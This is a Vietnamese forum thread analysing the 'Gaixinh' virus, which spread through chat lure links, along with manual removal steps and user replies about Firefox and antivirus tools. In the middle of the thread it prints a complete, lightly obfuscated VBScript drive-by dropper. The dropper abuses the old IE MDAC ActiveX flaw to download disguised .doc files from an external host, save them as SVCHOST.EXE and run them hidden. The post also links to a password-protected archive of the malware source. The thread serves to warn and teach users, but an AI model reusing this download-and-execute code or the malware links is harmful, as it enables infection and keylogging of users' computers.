[C]teens giải mã Virus Gaixinh

Tranh thủ các bạn nghỉ tết ai phát tán virus chơi vậy mà, virus cũng ăn tết hay thật.








Kho phim cho ba con xem dai` han day http://girltinh.tk/ << ( This message was certified by Welcome , no worm )



Em xinh qua : http://girltinh.tk/?=gaixinh << ( This message was certified by Welcome , no worm )



Bao Thy dong phim sex ne http://girltinh.tk/ ( This message was certified by Welcome , no worm )



Pha' trinh em VIet Nam qua xinh : http://girltinh.tk/?=phatrinh << ( This message was certified by Welcome , no worm )



Hoa hau bikini 2007 http://girltinh.tk/?=bikini2007 << ( This message was certified by Welcome , no worm )





Em Nhat Xinh Lam` Tinh` Hay http://girltinh.tk/?=nhatxinh be
careful !!! << ( This message was certified by Welcome , no worm
)


Sơ bộ ban đầu mà Lãng Du tôi giải mã nó được thế này:



- Lợi dụng lỗi MDAC cũ để phát tán virus khi dùng IE chưa cập nhật ,truy cập vào trang web hxxp://girltinh.tk.

- Virus gồm 2 file: SVCHOST.EXE và SVCHOST32.EXE để ở trong thư mục TMP:

TMP=C:\DOCUME~1\[usr]\LOCALS~1\Temp

- File SVCHOST32.EXE bị KAV phát hiện ra là Trojan-Spy.Win32.SCKeyLog.au. File còn lại chưa bị phát hiện.


Đây là mã nguồn con virus này http://www.fileden.com/files/2007/9/22/1451369/counter.rar

pass:virus


Con này khá cũ,xuất hiện 2 năm về trước,năm Lãng Du lên báo cũng là năm người ta viết bài về con Virus này Lợi dụng Scandal của Chung Hân Đồng,Trần Quán Hy để phát tán,các bạn không nên click vào (hàng gốc Lãng Du có,hú 1 tiếng share cho )

Để diệt Virus này,máy nên cài ít nhất 1 phần mềm diệt Virus có cập nhật,ví dụ NOD32,Kaspersky Anti-virus 8.0.0.240,BitDefender antivirus hoặc BKAV.

Diệt bằng tay bởi Lãng Du:
"Virus gồm 2 file: SVCHOST.EXE và SVCHOST32.EXE để ở trong thư mục TMP:

TMP=C:\DOCUME~1\[usr]\LOCALS~1\Temp
"

Truy cập vào thư mục C:\Documents and Settings\[usr]\Local Settings\Temp


[usr]: Là user truy cập Windowns của bạn,ví dụ của Lãng Du là BiKen thì nó sẽ là \Biken\
Local Setttings: Phải bật tính năng nhìn file ẩn của máy bằng cách : ở Explore,bấm vào Tools,chọn Folder Options,chọn tab View,bỏ đánh dấu ở ô hide protected operating system files thì bạn mới thấy được thư mục Local Setting,sau đó truy cập vào y chang đường dẫn trên,xoá ngay 2 file SVCHOST.EXE và SVCHOST32.EXE tải BKAV về quét,sau đó reboot máy lại

sax sax Khactinh wen cập nhật phiên bản diệt virus mới hèn chi kô tài nào diệt nổi con virus này dzờ xử lý xong rùi khoẻ wá

Code:









    on error resume next
    [b]dl = "http://s230910135.onlinehome.us/upload/images/icons/KhoPhimHangDep/ox.doc"[/b]
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="SVCHOST.EXE"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
   


    on error resume next
    [b]dl = "http://s230910135.onlinehome.us/upload/images/icons/KhoPhimHangDep/game_y.doc"[/b]
    Set df = document.createElement("object")
    df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    str="Microsoft.XMLHTTP"
    Set x = df.CreateObject(str,"")
    a1="Ado"
    a2="db."
    a3="Str"
    a4="eam"
    str1=a1&a2&a3&a4
    str5=str1
    set S = df.createobject(str5,"")
    S.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fname1="SVCHOST32.EXE"
    set F = df.createobject("Scripting.FileSystemObject","")
    set tmp = F.GetSpecialFolder(2)
    fname1= F.BuildPath(tmp,fname1)
    S.open
    S.write x.responseBody
    S.savetofile fname1,2
    S.close
    set Q = df.createobject("Shell.Application","")
    Q.ShellExecute fname1,"","","open",0
   






Trên là mã nguồn mà hacker phát tán con Virus Gaixinh,khi bạn tò mò truy cập vào link virus,nếu bằng FireFox thì không sao,bằng IE bản cũ chưa vá lỗi sẽ bị tải xuống 2 file ox.doc và game_y.doc
sau đó file ox.doc sẽ tự đổi tên lại thành SVCHOST.EXE còn file game_y.doc sẽ đổi thành SVCHOST32.EXE.

Trên đây là toàn bộ quá trình phát tán của con Virus mà Lãng Du đã viết ra cho các bạn xem

:a-01: Con "Gaixinh" nài cũ rích roài mà, mà có thằg nào ngu đến nỗi click vào mấy link vớ vẩn đó vậy

ku Nguyên yêu cầu viết vì một số bạn tò mò click vào

màh khi click vào thì lại có 1 số người rất là khoái

em hem hĩu cho lém,em cũng bị òy nhưng diệt tận nó òy,chã lo zì hết nữa

Ko click mà vẫn dính đếy ạ

anh LD oai, khi bị virus thì nóa thường đóng lun cái foder option thì sao chui vào đóa để mở mí file ẩn ( để ẩn dễ để film XXX ), task Manager còn bị khóa lun noái chi ...... trừ fi bik rõ dg` "link" thì oki hơn Nhớ hồi trc máy bị virus ra khỏi windows wét, nó báo BKAV nhĩm virus mới đau chứ Xài norton đc hơm ?

P/s : Anh LD, nếu vô tình link vào mí cái link trên thì cóa bị sao hơm

Vì các lý do nhức đầu trên,khuyến cáo hãy sử dụng FireFox !

Xài firefox seo tốt hơn IE ?

Xài FireFox rất sướng.....Chạy nhanh hơn IE rất nhìu.....Panda dg xài FireFox đây......Cần hok........pm Panda đi goi` Panda send cho xài ^^

BKAV1485 đủ xài rồi.

ủa a Lãng Du, cái con này nó khóa mẹ regedit đúng kô.trong Hkey_current_user...\system có Disable Regedit = 1

Bữa bấm vào để tìm hiểu, vào regedit kô được. Sau khi down cure của gã nào trên BVTH.com, mới vào coi lại được

Nói chung là nó vào hkeycurrentuser đổi từ homepage của IE tới vài cái gì trong ..\yahoo\pager...

Panda nói hết rồi đó,FireFox đã vượt mặt IE,tốc độ chắc chắn nhanh hơn IE,ít lỗi bảo mật và nếu có thì sẽ được sửa ngay vì nó là mã nguồn mở FireFox muôn năm :a-16:

Anh không bị nên không biết nhưng theo anh đoán nó khoá Task Manager,Khoá Regedit,mấy cái đó thì dễ mở thôi

oa`m, choa kid xin link Firefox ih ( link chất lượng nghen )

@@ Firefox có lỗi là sửa ngay, còn IE thì 10 năm chưa sửa, có sửa cũg lén lén lút lút. E đg xài bản firefox 3.0 beta 2, cũg đc, mỗi tội kô vào đc mail beta của Y!M @@

firefox là bản free hay pro ?

hjzhjz , hum bữa woa nhà chị em chơi . Zdua nik chị em , tự nhin có ai gửi cho chị í cái link nì nàh : Em xinh qua : http://girltinh.tk/?=gaixinh

fre 100%

anh La~ng Du cung cap xxx a`

Hôhô...mí thằng nay dâm mà "ngu " tụi pay áh...nhìn cái link là bít lìn...virus...thx pác Ken đã chị giáo...đọc cũng hỉu hỉu đựoc nguyên do một số fần

oa`m, Anh LD chỉ em cách mở Task Manager và folder options khi bị virus ih Đúng là nhìn link là bik link virus oa`i, ai kiu ngu vào mí link đóa, mún coi film XXX vào mocxi cũng đc ka` ( kid hơm cóa vào đóa coai âu, thậm chí là hơm cóa coai XXX nữa )

:a-01: mài bị dính hả Kid?